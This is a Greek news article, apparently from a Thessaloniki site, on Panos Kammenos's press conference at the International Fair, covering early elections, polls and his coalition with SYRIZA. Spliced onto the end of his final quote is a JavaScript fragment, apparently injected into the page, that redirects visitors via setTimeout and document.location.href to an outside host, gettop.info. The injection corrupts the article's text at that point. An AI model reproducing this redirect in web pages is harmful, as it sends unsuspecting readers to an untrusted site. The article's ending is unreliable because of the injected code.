Καμμένος στη ΔΕΘ: Αντέχουμε μέχρι το 2019 και μέχρι το 2023

0
30

 

Στη Θεσσαλονίκη βρίσκεται ο πρόεδρος των ΑΝΕΛ και υπουργός Εθνικής Άμυνας Πάνος Καμμένος για τη Διεθνή Έκθεση, όπου έδωσε συνέντευξη Τύπου.

Ο κ. Καμμένος αναφέρθηκε τόσο στις εκλογές που ζητεί η Νέα Δημοκρατία όσο και στις δημοσκοπήσεις και τα ποσοστά που δίνουν στους Ανεξάρτητους Έλληνες. Επιπλέον μίλησε και για τη σχέση του με τον συγκυβερνώντα ΣΥΡΙΖΑ και τον Αλέξη Τσίπρα.

Όσον αφορά στον Κυριάκο Μητσοτάκη και το αίτημα για εκλογές που διατυπώνει διαρκώς ο πρόεδρος των ΑΝΕΛ ανέφερε: «Δεν θα του κάνουμε το χατίρι του κ. Μητσοτάκη, που ζητάει εκλογές, αν και με συγκινεί ιδιαίτερα η φράση του Κώστα Καραμανλή προς τον Γιώργο Παπανδρέου, ότι ενίοτε τα αιτήματα γίνονται αποδεκτά, γιατί η χώρα χρειάζεται σταθερότητα».

«Αντέχουμε μέχρι το 2019 και μέχρι το 2023» απάντησε στην ερώτηση αν αντέχει έως το τέλος της τετραετίας η κοινοβουλευτική πλειοψηφία της κυβέρνησης, ενώ για τη συνεργασία με τον Αλέξη Τσίπρα και τον ΣΥΡΙΖΑ, είπε ότι είναι «άριστη», «έντιμη», ότι έχουν διαφορές, αλλά υπάρχει απόλυτος σεβασμός στις «κόκκινες γραμμές» των δύο πλευρών και ότι τα όποια προβλήματα παρουσιάστηκαν, επιλύθηκαν με τον καλύτερο τρόπο.

Σε ερώτηση του thestival.gr, αναφορικά με τις τελευταίες δημοσκοπήσεις όπου δίνουν αρκετά χαμηλό ποσοστό στους ΑΝΕΛ και τους τοποθετούν εκτός Βουλής και για το αν πιστεύει ότι στοίχισε η συνεργασία με τον ΣΥΡΙΖΑ, ο κ. Καμμένος απάντησε:

«Χαίρομαι που μας δίνουν εκτός Βουλής γιατί το Πανεπιστήμιο Μακεδονίας μου δίνει 0,5 με 1%. Τώρα μας δίνεi στο 2%. Είναι το ίδιο πανεπιστήμιο που έλεγε στο δημοψήφισμα ότι το »ΝΑΙ» θα βγει με 20% παραπάνω κι αντί να τους κλείσουν, συνεχίζουν να τους δίνουν χρήματα και να τους προβάλουν ως αποτελέσματα σοβαρών δημοσκοπήσεων. Πιστεύω ότι έχω ελπίδα, αφού τώρα με ανέβασε μισό τις εκατό.

Δεν είμαστε πολύ δημοφιλείς στις δημοσκοπήσεις. Χαιρόμαστε ιδιαίτερα να χάνουμε στις δημοσκοπήσεις και να κερδίζουμε στις εκλογές, όχι όπως κάποιοι άλλοι που κερδίζουν στις δημοσκοπήσεις και χάνουν στις εκλογές‘» setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here